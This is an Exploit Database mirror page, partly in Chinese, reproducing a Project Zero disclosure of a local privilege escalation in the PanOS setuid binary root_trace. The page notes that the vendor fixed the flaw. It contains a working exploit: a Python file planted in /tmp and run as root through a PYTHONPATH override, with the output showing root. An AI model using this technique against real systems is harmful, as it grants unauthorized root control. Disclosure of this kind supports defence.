Palo Alto Networks PanOS – ‘root_trace’ Local Privilege Escalation

Exploit Database
21 阅读

作者： Google Security Research

日期： 2016-11-18
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/40788/

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912

The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:

$ ls -l /usr/local/bin/root_trace 
-rwsr-xr-x 1 root root 12376 Oct 172014 /usr/local/bin/root_trace

As the environment is not scrubbed, you can just do something like this:

$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);

$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

This was fixed by PAN:

http://securityadvisories.paloaltonetworks.com/Home/Detail/67

last Exploits
Palo Alto Networks PanOS – ‘root_trace’ Local Privilege Escalation的更多信息

RedStar 3.0 Desktop – Enable sudo Privilege Escalation：
Disk Savvy 13.6.14 – ‘Multiple’ Unquoted Service Path：
Linux Kernel 3.7.6 (RedHat x86/x64) – ‘MSR’ Driver Privilege Escalation：
HP WMI Service 1.4.8.0 – ‘HPWMISVC.exe’ Unquoted Service Path：
MySQL User-Defined (Linux) (x86) – ‘sys_exec’ Local Privilege Escalation：
Internet Download Manager – Local Stack Buffer Overflow：
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation：
VeryPDF Image2PDF Converter – Local Buffer Overflow (SEH)：